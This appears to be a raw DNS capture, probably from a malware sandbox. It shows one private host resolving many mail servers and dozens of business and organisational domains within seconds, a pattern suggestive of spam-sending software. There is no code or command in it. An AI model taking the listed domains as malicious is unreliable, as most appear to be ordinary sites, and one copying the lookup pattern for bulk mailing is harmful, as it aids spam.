Mar 22, 2023 05:44:18.506212950 CET	8.8.8.8	192.168.2.5	0x5c33	No error (0)	smtp.sbcglobal.yahoo.com	smtp-sbc.mail.yahoo.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:44:18.506212950 CET	8.8.8.8	192.168.2.5	0x5c33	No error (0)	smtp-sbc.mail.yahoo.com	smtp1.sbc.mail.am0.yahoodns.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:44:18.506212950 CET	8.8.8.8	192.168.2.5	0x5c33	No error (0)	smtp1.sbc.mail.am0.yahoodns.net		67.195.12.38	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:18.506212950 CET	8.8.8.8	192.168.2.5	0x5c33	No error (0)	smtp1.sbc.mail.am0.yahoodns.net		66.163.170.48	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:18.506212950 CET	8.8.8.8	192.168.2.5	0x5c33	No error (0)	smtp1.sbc.mail.am0.yahoodns.net		66.218.88.163	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:19.342873096 CET	8.8.8.8	192.168.2.5	0x4e2b	No error (0)	www.fnw.us	fnw.us		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:44:19.342873096 CET	8.8.8.8	192.168.2.5	0x4e2b	No error (0)	fnw.us		137.118.26.67	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:19.348887920 CET	8.8.8.8	192.168.2.5	0xce10	Name error (3)	www.wkhk.net	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:19.359672070 CET	8.8.8.8	192.168.2.5	0x75d6	Server failure (2)	www.ftchat.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:20.851241112 CET	8.8.8.8	192.168.2.5	0x52aa	Name error (3)	www.owsports.ca	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:21.613792896 CET	8.8.8.8	192.168.2.5	0xf62d	No error (0)	gmail-smtp-in.l.google.com		172.217.218.26	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:21.864568949 CET	8.8.8.8	192.168.2.5	0xa268	Name error (3)	www.jroy.net	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:21.885026932 CET	8.8.8.8	192.168.2.5	0x9e65	No error (0)	mail.protonmail.ch		185.205.70.128	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:21.885026932 CET	8.8.8.8	192.168.2.5	0x9e65	No error (0)	mail.protonmail.ch		176.119.200.128	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:21.885026932 CET	8.8.8.8	192.168.2.5	0x9e65	No error (0)	mail.protonmail.ch		185.70.42.128	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:22.495963097 CET	8.8.8.8	192.168.2.5	0x9b9e	No error (0)	www.synetik.net	synetik.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:44:22.495963097 CET	8.8.8.8	192.168.2.5	0x9b9e	No error (0)	synetik.net		193.166.255.171	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:24.370589972 CET	8.8.8.8	192.168.2.5	0xef1	No error (0)	www.fnsds.org	comingsoon.namebright.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:44:24.370589972 CET	8.8.8.8	192.168.2.5	0xef1	No error (0)	comingsoon.namebright.com	cdl-lb-1356093980.us-east-1.elb.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:44:24.370589972 CET	8.8.8.8	192.168.2.5	0xef1	No error (0)	cdl-lb-1356093980.us-east-1.elb.amazonaws.com		54.236.92.93	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:24.370589972 CET	8.8.8.8	192.168.2.5	0xef1	No error (0)	cdl-lb-1356093980.us-east-1.elb.amazonaws.com		34.237.200.184	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:24.710812092 CET	8.8.8.8	192.168.2.5	0x31a8	No error (0)	akdeniz.nl		109.71.54.22	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:24.724549055 CET	8.8.8.8	192.168.2.5	0x9f95	No error (0)	msl-lock.com		165.160.13.20	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:24.724549055 CET	8.8.8.8	192.168.2.5	0x9f95	No error (0)	msl-lock.com		165.160.15.20	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:24.735888958 CET	8.8.8.8	192.168.2.5	0x338b	No error (0)	redgiga.com		172.67.186.153	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:24.735888958 CET	8.8.8.8	192.168.2.5	0x338b	No error (0)	redgiga.com		104.21.76.38	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:24.815392971 CET	8.8.8.8	192.168.2.5	0x8f96	No error (0)	shenhgts.net		199.59.243.220	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:24.935444117 CET	8.8.8.8	192.168.2.5	0x9940	No error (0)	k-nikko.com		18.177.67.59	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:24.947844982 CET	8.8.8.8	192.168.2.5	0xe1da	No error (0)	wantapc.net		157.7.107.49	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.015328884 CET	8.8.8.8	192.168.2.5	0xf942	No error (0)	awal.ws		127.0.0.1	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.139085054 CET	8.8.8.8	192.168.2.5	0xe80	No error (0)	themark.org		35.172.94.1	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.139085054 CET	8.8.8.8	192.168.2.5	0xe80	No error (0)	themark.org		100.24.208.97	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.139110088 CET	8.8.8.8	192.168.2.5	0x3820	Name error (3)	cpwpb.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.158940077 CET	8.8.8.8	192.168.2.5	0xd043	No error (0)	karila.fr		89.107.169.125	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.175029993 CET	8.8.8.8	192.168.2.5	0x5d41	No error (0)	hchc.org		34.224.10.110	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.175029993 CET	8.8.8.8	192.168.2.5	0x5d41	No error (0)	hchc.org		52.11.37.152	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.183512926 CET	8.8.8.8	192.168.2.5	0xe6e5	No error (0)	mxs.mail.ru		217.69.139.150	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.183512926 CET	8.8.8.8	192.168.2.5	0xe6e5	No error (0)	mxs.mail.ru		94.100.180.31	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.188740015 CET	8.8.8.8	192.168.2.5	0x79dd	Name error (3)	cpwpb.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.197556973 CET	8.8.8.8	192.168.2.5	0xcba3	No error (0)	diamir.de		138.201.65.187	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.223831892 CET	8.8.8.8	192.168.2.5	0xc63b	No error (0)	alt4.gmail-smtp-in.l.google.com		173.194.202.26	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.229708910 CET	8.8.8.8	192.168.2.5	0x7d02	Name error (3)	cpwpb.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.259573936 CET	8.8.8.8	192.168.2.5	0xee96	No error (0)	gmail-smtp-in.l.google.com		142.251.31.27	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.281101942 CET	8.8.8.8	192.168.2.5	0x23e9	No error (0)	usadig.com		198.100.146.220	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.298213959 CET	8.8.8.8	192.168.2.5	0x6aea	No error (0)	muhr-soehne.de		5.189.171.125	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.320636034 CET	8.8.8.8	192.168.2.5	0x34f	No error (0)	vvsteknik.dk		185.31.76.90	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.331629038 CET	8.8.8.8	192.168.2.5	0xe002	No error (0)	in1.smtp.messagingengine.com		66.111.4.71	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.331629038 CET	8.8.8.8	192.168.2.5	0xe002	No error (0)	in1.smtp.messagingengine.com		66.111.4.74	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.331629038 CET	8.8.8.8	192.168.2.5	0xe002	No error (0)	in1.smtp.messagingengine.com		66.111.4.70	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.331629038 CET	8.8.8.8	192.168.2.5	0xe002	No error (0)	in1.smtp.messagingengine.com		66.111.4.73	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.331629038 CET	8.8.8.8	192.168.2.5	0xe002	No error (0)	in1.smtp.messagingengine.com		66.111.4.75	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.331629038 CET	8.8.8.8	192.168.2.5	0xe002	No error (0)	in1.smtp.messagingengine.com		66.111.4.72	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.365699053 CET	8.8.8.8	192.168.2.5	0x567a	No error (0)	stopllc.com		162.241.233.114	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.390744925 CET	8.8.8.8	192.168.2.5	0x461d	No error (0)	okashimo.com		203.137.75.45	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.479252100 CET	8.8.8.8	192.168.2.5	0x52f6	No error (0)	hamaker.net		34.102.136.180	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.487256050 CET	8.8.8.8	192.168.2.5	0xbb4b	No error (0)	ntc.edu.au		192.124.249.15	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.540085077 CET	8.8.8.8	192.168.2.5	0x4cd5	No error (0)	strazynski.pl		85.128.196.22	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.587896109 CET	8.8.8.8	192.168.2.5	0xf5e	Name error (3)	www.udesign.biz	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.598035097 CET	8.8.8.8	192.168.2.5	0xf89a	No error (0)	touchfam.ca		15.197.142.173	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.598035097 CET	8.8.8.8	192.168.2.5	0xf89a	No error (0)	touchfam.ca		3.33.152.147	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.599761009 CET	8.8.8.8	192.168.2.5	0x67a1	No error (0)	www.muhr-soehne.de		5.189.171.125	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.685653925 CET	8.8.8.8	192.168.2.5	0x90ca	No error (0)	nme.co.jp		203.0.113.0	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.686588049 CET	8.8.8.8	192.168.2.5	0x24a9	No error (0)	top1oil.com		172.67.71.55	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.686588049 CET	8.8.8.8	192.168.2.5	0x24a9	No error (0)	top1oil.com		104.26.1.82	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.686588049 CET	8.8.8.8	192.168.2.5	0x24a9	No error (0)	top1oil.com		104.26.0.82	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.694385052 CET	8.8.8.8	192.168.2.5	0x6775	No error (0)	at-shun.com		210.140.73.39	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.716283083 CET	8.8.8.8	192.168.2.5	0x8788	Name error (3)	mail7.digitalwaves.co.nz	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.778603077 CET	8.8.8.8	192.168.2.5	0x2e72	No error (0)	revoldia.net		185.244.106.2	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.783853054 CET	8.8.8.8	192.168.2.5	0xf5e	Name error (3)	www.udesign.biz	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.822391033 CET	8.8.8.8	192.168.2.5	0x30aa	No error (0)	orlyhotel.com		172.67.156.49	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.822391033 CET	8.8.8.8	192.168.2.5	0x30aa	No error (0)	orlyhotel.com		104.21.48.207	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.846321106 CET	8.8.8.8	192.168.2.5	0x54fb	No error (0)	dhh.la.gov		52.200.51.73	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.878139019 CET	8.8.8.8	192.168.2.5	0x9a9c	No error (0)	yhsll.com		154.88.50.199	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.890530109 CET	8.8.8.8	192.168.2.5	0x31e4	No error (0)	webavant.com		148.72.176.26	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.895220041 CET	8.8.8.8	192.168.2.5	0x6b38	No error (0)	cpmteam.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.895220041 CET	8.8.8.8	192.168.2.5	0x6b38	No error (0)	cpmteam.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.910382032 CET	8.8.8.8	192.168.2.5	0xade8	No error (0)	www.reglera.com	reglera.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:44:25.910382032 CET	8.8.8.8	192.168.2.5	0xade8	No error (0)	reglera.com		64.125.133.18	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.922157049 CET	8.8.8.8	192.168.2.5	0x5b28	No error (0)	www.synetik.net	synetik.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:44:25.922157049 CET	8.8.8.8	192.168.2.5	0x5b28	No error (0)	synetik.net		193.166.255.171	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.932641983 CET	8.8.8.8	192.168.2.5	0xe18e	No error (0)	cjcagent.com		157.112.187.75	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.973157883 CET	8.8.8.8	192.168.2.5	0x7dec	No error (0)	sinwal.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:25.973157883 CET	8.8.8.8	192.168.2.5	0x7dec	No error (0)	sinwal.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.007214069 CET	8.8.8.8	192.168.2.5	0xa532	No error (0)	ifesnet.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.007214069 CET	8.8.8.8	192.168.2.5	0xa532	No error (0)	ifesnet.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.038045883 CET	8.8.8.8	192.168.2.5	0xbd64	No error (0)	www.diamir.de		138.201.65.187	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.044064999 CET	8.8.8.8	192.168.2.5	0xe878	No error (0)	kursavto.ru		31.177.80.70	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.044064999 CET	8.8.8.8	192.168.2.5	0xe878	No error (0)	kursavto.ru		31.177.76.70	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.045891047 CET	8.8.8.8	192.168.2.5	0xb668	No error (0)	sigtoa.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.045891047 CET	8.8.8.8	192.168.2.5	0xb668	No error (0)	sigtoa.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.062839985 CET	8.8.8.8	192.168.2.5	0xb8e6	No error (0)	shanks.co.uk		217.19.254.22	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.062875986 CET	8.8.8.8	192.168.2.5	0xc17a	No error (0)	bggs.com		35.230.155.43	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.084767103 CET	8.8.8.8	192.168.2.5	0x660e	No error (0)	insia.com		82.208.6.9	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.107492924 CET	8.8.8.8	192.168.2.5	0x4538	No error (0)	www.pohlfood.com	pohlfood.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:44:26.107492924 CET	8.8.8.8	192.168.2.5	0x4538	No error (0)	pohlfood.com		104.218.10.254	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.217813969 CET	8.8.8.8	192.168.2.5	0x43cd	No error (0)	nlcv.bas.bg		195.96.252.188	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.218977928 CET	8.8.8.8	192.168.2.5	0x7cd9	No error (0)	eos-i.com	macx1980.qy56.supcname.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:44:26.218977928 CET	8.8.8.8	192.168.2.5	0x7cd9	No error (0)	macx1980.qy56.supcname.com	mfddos.datacname.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:44:26.218977928 CET	8.8.8.8	192.168.2.5	0x7cd9	No error (0)	mfddos.datacname.com	15.204.18.132.datacname.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:44:26.218977928 CET	8.8.8.8	192.168.2.5	0x7cd9	No error (0)	15.204.18.132.datacname.com		15.204.18.132	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.285487890 CET	8.8.8.8	192.168.2.5	0xd641	No error (0)	rokoron.com		211.13.204.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.372417927 CET	8.8.8.8	192.168.2.5	0xfe45	Name error (3)	ludea.cz	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.490020037 CET	8.8.8.8	192.168.2.5	0x35bb	No error (0)	gcss.com		35.186.238.101	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.560321093 CET	8.8.8.8	192.168.2.5	0x7d79	Name error (3)	ludea.cz	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.592573881 CET	8.8.8.8	192.168.2.5	0xd1f	No error (0)	mxs.mail.ru		217.69.139.150	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.592573881 CET	8.8.8.8	192.168.2.5	0xd1f	No error (0)	mxs.mail.ru		94.100.180.31	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.604624033 CET	8.8.8.8	192.168.2.5	0x6e4d	No error (0)	workplus.hu		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.604624033 CET	8.8.8.8	192.168.2.5	0x6e4d	No error (0)	workplus.hu		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.609584093 CET	8.8.8.8	192.168.2.5	0xf19d	No error (0)	esmoke.net		204.15.134.44	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.619155884 CET	8.8.8.8	192.168.2.5	0x9de1	No error (0)	k-nikko.com		18.177.67.59	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.620131016 CET	8.8.8.8	192.168.2.5	0x73df	Name error (3)	polprime.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.620481014 CET	8.8.8.8	192.168.2.5	0x2ae5	No error (0)	avse.hu		185.129.138.60	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.650516987 CET	8.8.8.8	192.168.2.5	0x9bd3	No error (0)	alt4.gmail-smtp-in.l.google.com		173.194.202.26	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.663723946 CET	8.8.8.8	192.168.2.5	0x852c	Name error (3)	ludea.cz	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.686738014 CET	8.8.8.8	192.168.2.5	0xe1c9	No error (0)	scintel.com		23.239.201.14	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.687006950 CET	8.8.8.8	192.168.2.5	0x46a5	No error (0)	gmail-smtp-in.l.google.com		142.251.31.26	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.687784910 CET	8.8.8.8	192.168.2.5	0x1c9	No error (0)	hes.pt		52.19.230.145	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.688457012 CET	8.8.8.8	192.168.2.5	0x71d2	No error (0)	gydrozo.ru		91.220.211.163	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.711572886 CET	8.8.8.8	192.168.2.5	0x4912	No error (0)	smtp.compuserve.com	east.us.smtp.aol.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:44:26.711572886 CET	8.8.8.8	192.168.2.5	0x4912	No error (0)	east.us.smtp.aol.com	smtp.aol.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:44:26.711572886 CET	8.8.8.8	192.168.2.5	0x4912	No error (0)	smtp.aol.com	smtp.cs.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:44:26.711572886 CET	8.8.8.8	192.168.2.5	0x4912	No error (0)	smtp.cs.com	smtp.aol.g03.yahoodns.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:44:26.711572886 CET	8.8.8.8	192.168.2.5	0x4912	No error (0)	smtp.aol.g03.yahoodns.net		87.248.97.31	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.754537106 CET	8.8.8.8	192.168.2.5	0xb7d0	No error (0)	shittas.com		43.246.117.171	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.758331060 CET	8.8.8.8	192.168.2.5	0xeeca	Name error (3)	cvswl.org	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.762612104 CET	8.8.8.8	192.168.2.5	0x5a63	No error (0)	ftmobile.com		199.34.228.78	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.767945051 CET	8.8.8.8	192.168.2.5	0xd072	No error (0)	in1.smtp.messagingengine.com		66.111.4.71	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.767945051 CET	8.8.8.8	192.168.2.5	0xd072	No error (0)	in1.smtp.messagingengine.com		66.111.4.73	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.767945051 CET	8.8.8.8	192.168.2.5	0xd072	No error (0)	in1.smtp.messagingengine.com		66.111.4.75	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.767945051 CET	8.8.8.8	192.168.2.5	0xd072	No error (0)	in1.smtp.messagingengine.com		66.111.4.72	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.767945051 CET	8.8.8.8	192.168.2.5	0xd072	No error (0)	in1.smtp.messagingengine.com		66.111.4.74	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.767945051 CET	8.8.8.8	192.168.2.5	0xd072	No error (0)	in1.smtp.messagingengine.com		66.111.4.70	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.844650030 CET	8.8.8.8	192.168.2.5	0x59d0	Name error (3)	mail7.digitalwaves.co.nz	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.905761003 CET	8.8.8.8	192.168.2.5	0xec84	Server failure (2)	atis-sk.ca	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.957109928 CET	8.8.8.8	192.168.2.5	0x67db	No error (0)	cutchie.com		199.59.243.223	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.974754095 CET	8.8.8.8	192.168.2.5	0xa1be	No error (0)	smtp.live.com	a-0010.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:44:26.980510950 CET	8.8.8.8	192.168.2.5	0x5aa3	No error (0)	dspears.com	traff-6.hugedomains.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:44:26.980510950 CET	8.8.8.8	192.168.2.5	0x5aa3	No error (0)	traff-6.hugedomains.com	hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:44:26.980510950 CET	8.8.8.8	192.168.2.5	0x5aa3	No error (0)	hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com		3.140.13.188	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:26.980510950 CET	8.8.8.8	192.168.2.5	0x5aa3	No error (0)	hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com		18.119.154.66	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.018747091 CET	8.8.8.8	192.168.2.5	0x3622	No error (0)	hamaker.net		34.102.136.180	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.037055969 CET	8.8.8.8	192.168.2.5	0xb091	Name error (3)	grlawcc.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.048396111 CET	8.8.8.8	192.168.2.5	0xf847	Server failure (2)	atis-sk.ca	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.048959017 CET	8.8.8.8	192.168.2.5	0xbbef	No error (0)	riwn.org		198.49.23.144	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.048959017 CET	8.8.8.8	192.168.2.5	0xbbef	No error (0)	riwn.org		198.185.159.145	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.048959017 CET	8.8.8.8	192.168.2.5	0xbbef	No error (0)	riwn.org		198.49.23.145	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.048959017 CET	8.8.8.8	192.168.2.5	0xbbef	No error (0)	riwn.org		198.185.159.144	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.051067114 CET	8.8.8.8	192.168.2.5	0xc30a	No error (0)	isom.org		192.124.249.14	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.055640936 CET	8.8.8.8	192.168.2.5	0x3d3a	No error (0)	tabbles.net		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.055640936 CET	8.8.8.8	192.168.2.5	0x3d3a	No error (0)	tabbles.net		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.063283920 CET	8.8.8.8	192.168.2.5	0xd5f6	No error (0)	hes.pt		52.19.230.145	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.073620081 CET	8.8.8.8	192.168.2.5	0xd74c	Name error (3)	grlawcc.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.114885092 CET	8.8.8.8	192.168.2.5	0xac7a	Server failure (2)	atis-sk.ca	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.124782085 CET	8.8.8.8	192.168.2.5	0x2952	No error (0)	cbaben.com		173.205.126.33	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.259571075 CET	8.8.8.8	192.168.2.5	0xd49b	No error (0)	nekono.net		202.172.28.187	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.261969090 CET	8.8.8.8	192.168.2.5	0xc023	No error (0)	at-shun.com		210.140.73.39	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.279270887 CET	8.8.8.8	192.168.2.5	0xda12	No error (0)	cbras.com		54.39.198.18	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.295382977 CET	8.8.8.8	192.168.2.5	0xefe5	No error (0)	kayoaiba.com		154.213.117.166	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.343461037 CET	8.8.8.8	192.168.2.5	0x60ce	No error (0)	daytonir.com		172.64.147.213	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.343461037 CET	8.8.8.8	192.168.2.5	0x60ce	No error (0)	daytonir.com		104.18.40.43	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.348198891 CET	8.8.8.8	192.168.2.5	0x449f	No error (0)	dbnet.at		188.94.254.88	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.365963936 CET	8.8.8.8	192.168.2.5	0x7f31	No error (0)	envogen.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.365963936 CET	8.8.8.8	192.168.2.5	0x7f31	No error (0)	envogen.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.374795914 CET	8.8.8.8	192.168.2.5	0xbc6a	No error (0)	jabian.com		172.67.71.13	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.374795914 CET	8.8.8.8	192.168.2.5	0xbc6a	No error (0)	jabian.com		104.26.7.17	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.374795914 CET	8.8.8.8	192.168.2.5	0xbc6a	No error (0)	jabian.com		104.26.6.17	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.383521080 CET	8.8.8.8	192.168.2.5	0x81d0	No error (0)	awal.ws		127.0.0.1	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.405272007 CET	8.8.8.8	192.168.2.5	0xab00	No error (0)	snf.it		95.174.22.233	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.440282106 CET	8.8.8.8	192.168.2.5	0x77ae	No error (0)	ldh.la.gov		75.2.95.235	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.538445950 CET	8.8.8.8	192.168.2.5	0xc8d4	No error (0)	absblast.com		141.193.213.20	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:27.579855919 CET	8.8.8.8	192.168.2.5	0xb201	No error (0)	themark.org		35.172.94.1	A (IP address)	IN (0x0001)	false
